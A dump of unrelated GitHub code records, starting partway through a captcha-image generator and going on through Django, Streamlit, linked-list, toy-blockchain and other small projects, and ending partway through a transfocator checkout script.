'Z']\nCAPTCHA_LIST = NUMBER + LOW_CASE + UP_CASE\nCAPTCHA_LEN = 4\nCAPTCHA_HEIGHT = 60\nCAPTCHA_WIDTH = 160\n\n\ndef random_captcha_text(char_set=CAPTCHA_LIST, captcha_size=CAPTCHA_LEN):\n    '''\n    Generate random captcha text\n    :param char_set:\n    :param captcha_size:\n    :return:\n    '''\n    captcha_text = [random.choice(char_set) for _ in range(captcha_size)]\n    return ''.join(captcha_text)\n\n\ndef gen_captcha_text_and_image(width=CAPTCHA_WIDTH, height=CAPTCHA_HEIGHT,save=None):\n    '''\n    Generate a random captcha image\n    :param width:\n    :param height:\n    :param save:\n    :return: np array\n    '''\n    image = ImageCaptcha(width=width, height=height)\n    # captcha text\n    captcha_text = random_captcha_text()\n    captcha = image.generate(captcha_text)\n    # save to file\n    if save: image.write(captcha_text, captcha_text + '.jpg')\n    captcha_image = Image.open(captcha)\n    # convert to an np array\n    captcha_image = np.array(captcha_image)\n    return captcha_text, captcha_image\n\n\nif __name__ == '__main__':\n    t, im = gen_captcha_text_and_image(save=True)\n    print(t, im)\n\n\n","repo_name":"lpty/tensorflow_tutorial","sub_path":"captchaCnn/captcha_gen.py","file_name":"captcha_gen.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":242,"dataset":"github-code","pt":"37"} +{"seq_id":"26376238987","text":"from django.urls import re_path\nfrom book_inventory import views \n \nurlpatterns = [ \n    \n    # API PAGES (drf)\n    # re_path(r'^api/books/?$', views.book_inventory, name='book_inventory'),\n    re_path(r'^api/books/?$', views.BookInventoryView.as_view(), name='book_inventory'),\n    # re_path(r'^api/books/(?P<pk>(\\d+))/?$', views.book_details, name='book_details'),\n    re_path(r'^api/books/(?P<pk>(\\d+))/?$', views.SelectedBookView.as_view(), name='book_details'),\n\n    # REGULAR PAGES\n    re_path(r'^books/(?P<pk>(\\d+))/?$', views.list_one, name='list_one'),\n    # re_path(r'^(?:books)?/?$', views.list_all, name='list_all'),\n    re_path(r'^books/?$', views.list_all, name='list_all'),\n    re_path(r'^$', views.list_all, name='list_all'),\n] \n","repo_name":"aybarskerem/BookInventory","sub_path":"Library/book_inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15222560340","text":"N, r, c = map(int, input().split())\n\ndef cube4(n,x,y):\n    if x <= 1 and y <= 1:\n        return 2*x+y\n    half_length = 2**(n-1)\n    if half_length > x:\n        if half_length > y:\n            return cube4(n-1,x,y)\n        else:\n            return 4**(n-1) + cube4(n-1,x,y-half_length)\n    else:\n        return 4**(n-1)*2 + cube4(n,x-half_length,y)\nprint(cube4(N,r,c))","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj1074.py","file_name":"boj1074.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70110308267","text":"import json\nfrom operator import ge\nfrom generator import Generator\nfrom address import address\n\nclass person:\n    def __init__(self):\n        Initials = Generator.genFullNameAndGender()\n        self.firstName = Initials['name']\n        self.lastName = Initials['surname']\n        self.gender = Initials['gender']\n        self.birthdate = Generator.genBirthDate()\n        self.cpr = Generator.genCPR(self.gender, self.birthdate)\n        self.phone = Generator.genPhoneNumber()\n        self.address = address()\n\n    #Debug\n    def printPerson(self):\n        print(f'First Name: {self.firstName} \\nLast Name: {self.lastName} \\nGender: {self.gender} \\nBirthdate: {self.birthdate} \\nCPR: {self.cpr}')\n        #Address\n        print(f'Town: {self.address.town} \\nZip Code: {self.address.zipCode} \\nStreet Name and Number: {self.address.street} {self.address.number} \\nFloor: {self.address.floor} \\nDoor: {self.address.door}')\n\n    def toJson(self):\n        jsonString = ''\n        personString = 
f'\"firstName\":\"{self.firstName}\", \"lastName\":\"{self.lastName}\", \"gender\":\"{self.gender}\", \"birthdate\":\"{self.birthdate}\", \"cpr\":\"{self.cpr}\", \"phone\":\"{self.phone}\",'\n        personString = '{' + personString \n        addressString = str(self.address.__dict__).replace('{','')\n        addressString = addressString.replace(\"'\",'\"')\n        jsonString = personString + addressString\n        return jsonString\n\n\n","repo_name":"ddorenDK/testing-course-man1","sub_path":"src/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31799410796","text":"import pika\n\n# open a socket connection\nconnection = pika.BlockingConnection(\n    pika.ConnectionParameters('localhost')\n)\n\n# declare a channel\nchannel = connection.channel()\n\n# declare an intermediate exchange (fanout broadcaster)\nchannel.exchange_declare(exchange='logs', exchange_type='fanout')\n\nwhile True:\n    message = input(\">>:\").strip()\n    if message == \"stop\":\n        break\n    # publish the message to the corresponding queue(s)\n    channel.basic_publish(exchange='logs', #exchange name\n                          routing_key='', # queue name (ignored by fanout)\n                          body=message, # message body\n                          )\n    print(\"send \", message)\n\n# close the socket\nconnection.close()\n","repo_name":"besiccode/python_learning","sub_path":"RabbitMQ/fanout_producer.py","file_name":"fanout_producer.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595276638","text":"#!/usr/bin/env python3\n\n'''\nName: test_mailroom.py\nAuthor: Eric Rosko\nDate: May 28, 2018\nAssignment: 7\nPython ver. 3\n\nUsage: py.test -sv\n\n'''\n\nimport logging\nimport pytest\nfrom mailroom import logger\nfrom peewee import *\nfrom mailroom import Donor, Donation\n# from mailroom import database\n\n\ndef setup_function(function):\n    \"\"\"\n    Runs once before each function in this file.\n    \"\"\"\n    global database\n    database = SqliteDatabase('donors.db')\n    database.connect()\n    database.execute_sql('PRAGMA foreign_keys = ON;')  # needed for sqlite only\n    # database.create_tables([ Donor, Donation])\n    # database.execute_sql(\"delete from Donor\")\n    # database.execute_sql(\"delete from Donation\")\n\n\ndef teardown_function(function):\n    global database\n    database.close()\n\n\ndef test_add_donor():\n    global database\n    try:\n        with database.transaction():\n            new_donor = Donor.create(\n                name = 'Bob3')\n            new_donor.save()\n\n            logger.info('Reading and print donor')\n            for donor in Donor:\n                logger.info(f'{donor.name}')\n\n    except Exception as e:\n        logger.info(f'Error creating donor')\n        logger.info(e)\n\n    # with database.transaction():\n    count = Donor.select().count()\n    print(\"count is\", count)\n    assert count == 1\n\n\ndef test_add_two_donors():\n    global database\n    try:\n        with database.transaction():\n            new_donor = Donor.create(\n                name = 'Bob')\n            new_donor.save()\n\n            new_donor2 = Donor.create(\n                name = 'Dave')\n            new_donor2.save()\n\n            logger.info('Reading and print donor')\n            for donor in Donor:\n                logger.info(f'{donor.name}')\n\n    except Exception as e:\n        logger.info(f'Error creating donor')\n        logger.info(e)\n\n    # with database.transaction():\n    count = Donor.select().count()\n    print(\"count is\", count)\n    assert count == 2\n\n\ndef test_add_donation():\n\n    try:\n        with database.transaction():\n            new_donor = Donor.create(\n                name = 'Bob')\n            new_donor.save()\n\n        with database.transaction():\n            new_donation = Donation.create(donor_id=new_donor.name,\n                amount=123.45)\n            new_donation.save()\n\n    except Exception as e:\n        logger.info(f'Error creating donation')\n        logger.info(e)\n\n\nif __name__ == \"__main__\":\n    pass\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/eric_rosko/lesson-07/test_mailroom.py","file_name":"test_mailroom.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7800161702","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Welcome to Jupyter!\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom cv2 import cv2 #'pip install opencv-python' required\n\nDATADIR = \"C:/Datasets/PetImages\"\nCATEGORIES = [\"DOG\", \"CAT\"]\nIMG_SIZE = 50\n\nfor category in CATEGORIES:\n    path = os.path.join(DATADIR, category) #path to cats or dogs directory\n    for img in os.listdir(path):\n        #convert images in to an array while grayscaling the image\n        img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_GRAYSCALE)\n        \n        plt.imshow(img_array, cmap=\"gray\")\n        plt.show()\n        #break\n    #break > to test grayscale image\n\n\n# In[23]:\n\n\nprint(img_array.shape)\n\n\n# In[17]:\n\n\ntraining_data = []\n\ndef create_training_data():\n    for category in CATEGORIES:\n        path = os.path.join(DATADIR, category) #path to cats or dogs directory\n        class_num = CATEGORIES.index(category)\n        for img in os.listdir(path):\n            try:\n                #convert images in to an array while grayscaling the image\n                img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE)\n                #resize the image\n                new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n                #add the image to training dataset\n                training_data.append([new_array, class_num])\n            except Exception as _:\n                pass\n    \ncreate_training_data()\n\n\n# In[58]:\n\n\nprint(len(training_data))\n\n\n# In[64]:\n\n\nimport random\n#shuffle training dataset for efficient learning\nrandom.shuffle(training_data)\n\n\n# In[72]:\n\n\nX = []\ny = []\n\nfor features, label in training_data:\n    X.append(features)\n    y.append(label)\n    \nX = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1) #1 because its grayscale\n\n\n# In[85]:\n\n\nimport pickle\n\npickle_out = open(\"X.pickle\", \"wb\")\npickle.dump(X, pickle_out)\npickle_out.close()\n\npickle_out = open(\"y.pickle\", \"wb\")\npickle.dump(y, pickle_out)\npickle_out.close()\n\n\n# In[99]:\n\n\npickle_in = open(\"X.pickle\", \"rb\")\nX = pickle.load(pickle_in)\n\n\n# This repo contains an introduction to [Jupyter](https://jupyter.org) and [IPython](https://ipython.org).\n# \n# Outline of some basics:\n# \n# * [Notebook Basics](../examples/Notebook/Notebook%20Basics.ipynb)\n# * [IPython - beyond plain python](../examples/IPython%20Kernel/Beyond%20Plain%20Python.ipynb)\n# * [Markdown Cells](../examples/Notebook/Working%20With%20Markdown%20Cells.ipynb)\n# * [Rich Display System](../examples/IPython%20Kernel/Rich%20Output.ipynb)\n# * [Custom Display logic](../examples/IPython%20Kernel/Custom%20Display%20Logic.ipynb)\n# * [Running a Secure Public Notebook Server](../examples/Notebook/Running%20the%20Notebook%20Server.ipynb#Securing-the-notebook-server)\n# * [How Jupyter works](../examples/Notebook/Multiple%20Languages%2C%20Frontends.ipynb) to run code in different languages.\n\n# You can also get this tutorial and run it on your laptop:\n# \n#     git clone https://github.com/ipython/ipython-in-depth\n# \n# Install IPython and Jupyter:\n# \n# with [conda](https://www.anaconda.com/download):\n# \n#     conda install ipython jupyter\n# \n# with pip:\n# \n#     # first, always upgrade pip!\n#     pip install --upgrade pip\n#     pip install --upgrade ipython 
jupyter\n# \n#     Start the notebook in the tutorial directory:\n# \n#     cd ipython-in-depth\n#     jupyter notebook\n","repo_name":"ryanleek/TensorFlow","sub_path":"tutorial_02.py","file_name":"tutorial_02.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25753592824","text":"from google.cloud import storage\n\n\nclass Transfer:\n\n    def __init__(self, data_string, blob_name, bucket, project):\n        self._data_string = str(data_string)\n        self._blob_name = blob_name\n        self._bucket = bucket\n        self._project = project\n        self._storage_client = storage.Client(project=self._project)\n        self.upload_to_gcp()\n\n\n    def upload_to_gcp(self):\n        self._bucket = self._storage_client.bucket(self._bucket)\n        self._blob = self._bucket.blob(self._blob_name)\n        self._blob.upload_from_string(self._data_string)","repo_name":"crabb-beltran/encypt-decrypt-pgp-function","sub_path":"app/upload_string_gcp.py","file_name":"upload_string_gcp.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73789608748","text":"import streamlit as st\nimport pandas as pd\nimport joblib\n\n# App title\nst.title('Pronóstico de lluvia para mañana')\n\n# Load the dataset to get the column names\ndf = pd.read_csv('datasets/df_reg.csv', index_col=0)\n\n# Load the pipelines\nPATH_REG = 'models/regresion_pipeline.joblib'\nPATH_CLAS = 'models/clasificacion_pipeline.joblib'\n\npipeline_reg = joblib.load(PATH_REG)\npipeline_clas = joblib.load(PATH_CLAS)\n\nfeature_names = pipeline_reg.named_steps['imputer']\\\n                .get_feature_names_out()\n\n\n# Define the variable names; we drop the wind-direction\n# variables, which the app does not use.\ncolumnas_numericas = list(df.columns[:-2])\n\n# cols_dir = ['WindGustDir', 'WindDir9am', 'WindDir3pm']\n\n# for col in cols_dir:\n#     columnas_numericas.remove(col)\n\n# Create one slider per numeric variable\nfeatures = [st.slider(columna,\n                      df[columna].min(),\n                      df[columna].max(),\n                      round(df[columna].mean(), 2)) \n            for columna in columnas_numericas]\n\n# Map the boolean option to text and append it to the\n# numeric features used for the prediction\nraintoday_option_mapping = {'Sí': 1, 'No': 0}\nraintoday_option = st.selectbox('¿Hoy llovió?',\n                                list(raintoday_option_mapping.keys()))\n\nall_features = features + [raintoday_option_mapping[raintoday_option]]\n\ndata_para_predecir = pd.DataFrame([all_features],\n                                  columns=feature_names)\n\n# Run the predictions on the front-end input\npred_reg = pipeline_reg.predict(data_para_predecir)\npred_clas = pipeline_clas.predict(data_para_predecir)\n\n# Display the predictions in the app\n\nresultado_clas = '**sí** 🌧️' if pred_clas else '**no** 🌞'\nrespuesta_reg = 'y' if pred_clas else 'pero'\nresultado_reg = round(float(pred_reg[0][0]), 2)\n\nst.markdown(f'Probablemente mañana {resultado_clas} llueva {respuesta_reg} caigan {resultado_reg} mm/h de lluvia.')","repo_name":"Isaiasgaray/aa_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18194133402","text":"from typing import Dict, Type\n\nfrom bofire.data_models.outlier_detection import api as data_models\nfrom bofire.outlier_detection.outlier_detection import (\n    IterativeTrimming,\n    
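# runtime classes implementing the corresponding data models\n    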
OutlierDetection,\n)\n\nOUTLIER_MAP: Dict[Type[data_models.OutlierDetection], Type[OutlierDetection]] = {\n    data_models.IterativeTrimming: IterativeTrimming,\n}\n\n\ndef map(data_model: data_models.OutlierDetection) -> OutlierDetection:\n    cls = OUTLIER_MAP[data_model.__class__]\n    return cls(data_model=data_model)  # type: ignore\n","repo_name":"experimental-design/bofire","sub_path":"bofire/outlier_detection/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"37"} +{"seq_id":"1200015265","text":"import time\nfrom hashlib import sha256\nfrom storages import Storage, InMemoryStorage\n\nclass Block:\n\n    def __init__(self, *args, **kwargs):\n        \n        if len(args) > 0:\n            prev_hash = args[0]\n        elif 'prev_hash' in kwargs:\n            prev_hash = kwargs.pop('prev_hash')\n        else:\n            raise ValueError\n\n        if type(prev_hash) != str:\n            prev_hash = hex(prev_hash)\n\n        if len(args) > 1:\n            difficulty = args[1]\n        elif 'difficulty' in kwargs:\n            difficulty = kwargs.pop('difficulty')\n        else:\n            raise ValueError\n\n        self.transactions = []\n        self.states = {}\n\n        self.header = {\n            'prev_hash': prev_hash,\n            'timestamp': int(time.time()),\n            'nonce': 0,\n            'difficulty': difficulty,\n            # lists and dicts are unhashable, so digest their string form instead\n            'data_hash': sha256(str((self.transactions, self.states)).encode()).hexdigest()\n        }\n\n    def __repr__(self):\n        return str({\n            'header': self.header,\n            'body': {\n                'transactions': self.transactions,\n                'states': self.states\n            }\n        })\n\n    def block_hash(self):\n        # sha256 needs bytes and yields a hex string, so this is a regular\n        # method rather than __hash__ (which must return an int)\n        return sha256(str(self.header).encode()).hexdigest()\n\n    def find_nonce(self):\n        self.header['nonce'] = 0\n        difficulty = self.header['difficulty']\n        while self.block_hash()[:difficulty] != '0'*difficulty:\n            self.header['nonce'] += 1\n\n    def verify(self):\n        difficulty = self.header['difficulty']\n        return self.block_hash()[:difficulty] == '0'*difficulty\n\n    def add_transaction(self, txn):\n        self.transactions.append(txn)\n\nclass Blockchain:\n\n    default_storage_class = InMemoryStorage\n    default_genesis = Block(hex(0), 0)  # difficulty 0: the genesis block always verifies\n\n    def __init__(self, *args, **kwargs):\n        self._storage_class = kwargs.pop('storage', self.default_storage_class)\n        genesis = kwargs.pop('genesis', self.default_genesis)\n        self._storage = self._storage_class(*args, **kwargs) \n        self._storage.put_block(genesis)\n        self._transaction_pool = []\n\n    def add_block(self, block: Block):\n        assert block.header['prev_hash'] in self\n        assert block.verify()\n        self._storage.put_block(block)\n\n    def create_transaction(self):\n        pass\n\n    def __contains__(self, block_hash):\n        return block_hash in self._storage\n\n\n","repo_name":"z0marlin/DCA","sub_path":"blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42545089300","text":"from django import forms\nfrom django.forms import ModelForm\nfrom .models import screen,row,seat,film,showing,Booking\nfrom django.contrib.admin.widgets import AdminSplitDateTime,AdminDateWidget,AdminTimeWidget\nfrom django.core.exceptions import ValidationError\nfrom django.utils import timezone\n\n\n#Screen Forms\nclass ScreenForm(ModelForm):\n    class Meta:\n        model = screen\n        fields = \"__all__\"\n\nclass RowForm(ModelForm):\n    class Meta:\n        model = row\n        fields = \"__all__\"\n\nclass SeatForm(ModelForm):\n    class Meta:\n        model = seat\n        fields = \"__all__\"\nclass FilmForm(ModelForm):\n    class Meta:\n        model = film\n        fields = \"__all__\"\nclass ShowingForm(ModelForm):\n    \n    class Meta:\n        model = showing\n        fields = 
(\"date\",\"startTime\",\"film\",\"screen\")\n\nclass BookingForm(ModelForm):\n \n class Meta:\n model = Booking\n fields = (\"student_tickets\",\"child_tickets\",\"adult_tickets\")\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n student_tickets = self.cleaned_data['student_tickets']\n child_tickets = self.cleaned_data['child_tickets']\n adult_tickets = self.cleaned_data['adult_tickets']\n #instance.user = current_user\n instance.student_tickets = student_tickets\n instance.child_tickets = child_tickets\n instance.adult_tickets = adult_tickets\n # instance.total_price = calculate_total_price(instance.showing, student_tickets, child_tickets, adult_tickets)\n if commit:\n instance.save()\n return instance\n\nclass BookingForm_cr(ModelForm):\n \n class Meta:\n model = Booking\n fields = (\"cr_tickets\",)\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n cr_tickets = self.cleaned_data[\"cr_tickets\"]\n\n instance.cr_tickets = cr_tickets\n\n # instance.total_price = calculate_total_price(instance.showing, student_tickets, child_tickets, adult_tickets)\n if commit:\n instance.save()\n return instance\n\n\n# booking guest\nclass BookingForm_g(ModelForm):\n \n class Meta:\n model = Booking\n fields = (\"adult_tickets\",\"child_tickets\",)\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n \n child_tickets = self.cleaned_data['child_tickets']\n adult_tickets = self.cleaned_data['adult_tickets']\n\n instance.child_tickets = child_tickets\n instance.adult_tickets = adult_tickets\n\n # instance.total_price = calculate_total_price(instance.showing, student_tickets, child_tickets, adult_tickets)\n if commit:\n instance.save()\n return instance\n\n\n# class BookingForm_cr(ModelForm):\n \n# class Meta:\n# model = Booking\n# fields = (\"cr_tickets\", \"showing\")","repo_name":"fyates1/UWEFlix-Group-6","sub_path":"uweflix/cinema/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73842629547","text":"class MyNode:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def pointTo(self, node):\n self.next = node\n \n def __str__(self):\n return str(f'{self.value} --> {self.next}')\n\nclass MyLinkedList:\n\n def __init__(self, value):\n self.head = MyNode(value)\n self.tail = self.head\n self.length = 1\n\n def append(self, value):\n newNode = MyNode(value)\n self.tail.pointTo(newNode)\n self.tail = newNode\n self.length += 1\n\n def prepend(self, value):\n newNode = MyNode(value)\n newNode.pointTo(self.head)\n self.head = newNode\n self.length += 1\n\n def traverseToIndex(self, index):\n currentNode = self.head\n i = 0\n while(i < index and index < self.length):\n currentNode = currentNode.next\n i += 1\n\n return currentNode\n\n def insert(self, index, value):\n\n if (index == 0):\n self.prepend(value)\n return\n elif (index >= self.length):\n self.append(value)\n return\n \n newNode = MyNode(value)\n nodeBefore = self.traverseToIndex(index-1)\n \n newNode.pointTo(nodeBefore.next)\n nodeBefore.pointTo(newNode)\n\n self.length += 1\n \n def remove(self, index):\n nodeBefore = self.traverseToIndex(index-1)\n nodeToDelete = nodeBefore.next \n 
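# unlink the target by pointing the previous node past it\n        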
nodeBefore.pointTo(nodeToDelete.next)\n        if (index+1 >= self.length):\n            self.tail = nodeBefore\n        del nodeToDelete\n        self.length -= 1\n\n    def reverse(self):\n        prevNode = None\n        currentNode = self.head\n        nextNode = currentNode.next\n\n        while(nextNode):\n            tempNode = nextNode.next\n            nextNode.pointTo(currentNode)\n            currentNode.pointTo(prevNode)\n            prevNode = currentNode\n            currentNode = nextNode\n            nextNode = tempNode\n\n        self.head, self.tail = self.tail, self.head\n\n    # Function for the class to return something readable\n    def __str__(self):\n        return str(self.head)\n\nmyLinkedList = MyLinkedList(10)\nprint(myLinkedList)\nmyLinkedList.append(5)\nmyLinkedList.append(16)\nmyLinkedList.prepend(1)\nprint(myLinkedList)\nmyLinkedList.insert(2, 4)\nprint(myLinkedList)\nmyLinkedList.insert(6, 3)\nprint(myLinkedList)\nmyLinkedList.remove(1)\nprint(myLinkedList)\nmyLinkedList.remove(4)\nprint(myLinkedList)\n\nmyLinkedList.reverse()\nprint(myLinkedList)\n\n# ----- Pointers\ndef pointers():\n    object = { 'a': True }\n    pointer = object\n\n    object['a'] = 'booya'\n\n    del object\n\n    print(f'The pointer value is: {pointer}')\n    # print(f'The object value is: {object}') # This sends an error because the variable `object` was deleted\n\npointers()","repo_name":"JuanRCifuentes/Data-Structures---Algorithms","sub_path":"Data_Structures/linked_lists.py","file_name":"linked_lists.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23236554449","text":"# Ask the user for the amount to invest, the annual interest rate and the number of years\r\ncantidad_invertida = float(input(\"Enter the amount to invest: \"))\r\ninteres_anual = float(input(\"Enter the annual interest rate in percent: \"))\r\naños = int(input(\"Enter the number of years: \"))\r\n\r\n# Compute the capital obtained from the investment\r\ncapital_obtenido = cantidad_invertida * (1 + (interes_anual / 100)) ** años\r\n\r\n# Show the capital obtained from the investment\r\nprint(\"The capital obtained from the investment is:\", round(capital_obtenido, 2))\r\n","repo_name":"Alexandercs19/Practicas-Basicas-Python","sub_path":"Tareas Python/InversionCapital.py","file_name":"InversionCapital.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39899791659","text":"def wordCount(text):\n    dicto = {}\n    lst = text.split()\n    lst.sort()\n    for word in lst:\n        if word in dicto:\n            dicto[word] = dicto[word] + 1\n        else:\n            dicto[word] = 1\n    for word in dicto:\n        if dicto[word] == 1:\n            verb = \" time\"\n        else:\n            verb = \" times\"\n\n        print(word,\" appears \"+ str(dicto[word]) + verb)\n\ntext = \"all animals are equal but some animals are more equal than other\"\nwordCount(text)\n","repo_name":"Gunglarino/python","sub_path":"lesExcercises/week1-5/dictLes9.py","file_name":"dictLes9.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7473958753","text":"\"\"\"\nIntroduction\n============\n\nThese scripts use the IOC-defined bypass tools, meaning that no lenses will be\nmoved and photon energy does _not_ need to change.\n\nPerforming a checkout\n=====================\n\nFirst, load an IPython session with this module.\n\n    $ source /reg/g/pcds/pyps/conda/pcds_conda\n    $ ipython -i -m transfocate.automated_checkout\n\nIf the above times out, re-run the script. 
It's ophyd related and will be\nresolved eventually. Otherwise, continue on.\n\nManual mode\n===========\n\nTo perform a scan for a single XRT lens, use:\n\n >>> sweep_and_plot_xrt(xrt_lens, num_steps=100)\n\nThis will choose different combinations of TFS lenses to span the region, and\nscan energy in 100 discrete steps.\n\nTo perform a scan for _all_ XRT lenses, use:\n\n >>> sweep_and_plot_xrt_all(num_steps=100)\n\nPer-lens data and plots will be saved to Excel and PNG/PDF files, respectively.\nThis can be combined into a full checkout report with the following:\n\n >>> generate_report()\n\nAutomatic mode\n==============\n\nAutomatic mode will perform ``sweep_and_plot_xrt_all()`` and\n``generate_report()`` for you.\n\nReport generation\n=================\n\nReport generation will use the files generated from the scan steps above.\nIt will only use existing files from the current directory.\n\nIt can be used on its own - after exiting the IPython session and reloading\nit - without scanning again.\n\n***************************************************************************\n***************************************************************************\nNow, you'll have the option to perform the steps automatically or manually.\n***************************************************************************\n***************************************************************************\n\n\"\"\"\nimport matplotlib # isort: skip\nimport time\n\ntry: # noqa\n matplotlib.use(\"Qt5Agg\") # noqa\nexcept Exception: # noqa\n ... # noqa\nimport bluesky\nimport databroker\nimport matplotlib.pyplot as plt\nfrom bluesky.callbacks import LiveTable\n\nimport transfocate\nimport transfocate.checkout\n\nfrom .table import generate_report\nfrom .table.info import MIN_ENERGY\nfrom .table.info import data as spreadsheet_data\n\nDESCRIPTION = __doc__\n\nlens_to_spreadsheet_df = {\n 0: spreadsheet_data[\"NO_LENS\"],\n 1: spreadsheet_data[\"LENS1_750\"],\n 2: spreadsheet_data[\"LENS2_428\"],\n 3: spreadsheet_data[\"LENS3_333\"],\n}\n\nfields = [\n \"energy\",\n \"trip_low\",\n \"trip_high\",\n \"faulted\",\n \"state_fault\",\n \"violated\",\n \"min_fault\",\n \"lens_required_fault\",\n \"table_fault\",\n \"tfs_radius\",\n \"xrt_radius\",\n]\n\n\ndef plot_sweeps():\n \"\"\"Plot the databroker results from a `sweep_energy_plan`.\"\"\"\n fig, axes = plt.subplots(\n ncols=2, nrows=2, constrained_layout=True, figsize=(18, 16)\n )\n plot_sweep_energy(0, ax=axes[0, 0], dbi=db[-4])\n plot_sweep_energy(1, ax=axes[0, 1], dbi=db[-3])\n plot_sweep_energy(2, ax=axes[1, 0], dbi=db[-2])\n plot_sweep_energy(3, ax=axes[1, 1], dbi=db[-1])\n fig.tight_layout()\n\n fn = \"summary\"\n plt.savefig(f\"{fn}.png\")\n plt.savefig(f\"{fn}.pdf\")\n\n\ndef plot_sweep_energy(xrt_lens, dbi, ax=None):\n \"\"\"Plot the databroker results from a `sweep_energy_plan`.\"\"\"\n df = dbi.table()\n df = df.set_index(df.energy)\n\n if ax is None:\n _, ax = plt.subplots(constrained_layout=True, figsize=(12, 10))\n\n plot_spreadsheet_data(xrt_lens, ax=ax, df=lens_to_spreadsheet_df[xrt_lens])\n\n ax.set_yscale(\"log\")\n\n df = df.copy()\n # **NOTE** for the purposes of plotting in log scale, set tfs_radius = 1\n # when zero in actuality\n df.loc[df.tfs_radius == 0.0, \"tfs_radius\"] = 1.0\n\n ax.scatter(\n df.energy, df.trip_high, label=\"Trip high [PLC]\", color=\"black\", marker=\"v\"\n )\n ax.scatter(\n df.energy, df.trip_low, label=\"Trip low [PLC]\", color=\"black\", marker=\"^\"\n )\n\n if False:\n when_faulted = df.where(df.faulted == 1).dropna()\n 
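# mark every faulted sample as a single series (this branch is disabled above)\n        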
ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - fault\",\n color=\"red\",\n marker=\"x\",\n )\n else:\n when_faulted = df.where(df.min_fault == 1).dropna()\n ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - min energy fault\",\n color=\"red\",\n marker=\"x\",\n )\n\n when_faulted = df.where(df.lens_required_fault == 1).dropna()\n ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - lens required\",\n color=\"red\",\n marker=\"D\",\n )\n\n when_faulted = df.where(df.table_fault == 1).dropna()\n ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - table fault\",\n color=\"red\",\n marker=\"+\",\n )\n\n when_not_faulted = df.where(df.faulted == 0).dropna()\n ax.scatter(\n when_not_faulted.index,\n when_not_faulted.tfs_radius,\n color=\"black\",\n marker=\".\",\n s=3,\n label=\"Scan point - no fault\",\n )\n\n ax.set_ylim(1, 1e4)\n\n ax.legend(loc=\"upper right\")\n xrt_radius, *_ = list(df.xrt_radius)\n if xrt_radius == 0.0:\n ax.set_title(\"No pre-focusing lens\")\n else:\n ax.set_title(f\"Pre-focusing radius = {xrt_radius:.2f}um (Lens #{xrt_lens})\")\n return xrt_radius\n\n\ndef plot_spreadsheet_data(xrt_lens, ax, df):\n ax.fill_between(\n df.energy,\n df.trip_min,\n df.trip_max,\n where=(df.trip_max > df.trip_min),\n interpolate=True,\n color=\"red\",\n alpha=0.2,\n hatch=\"/\",\n )\n\n ax.plot(df.energy, df.trip_min, lw=1, color=\"black\", label=\"\")\n ax.plot(df.energy, df.trip_max, lw=1, color=\"black\", label=\"\")\n\n min_energy = MIN_ENERGY[xrt_lens]\n if min_energy > 0.0:\n ax.fill(\n (0, 0, min_energy, min_energy),\n (0, 1e4, 1e4, 0),\n color=\"red\",\n edgecolor=\"None\",\n alpha=0.2,\n hatch=\"\\\\\",\n )\n\n 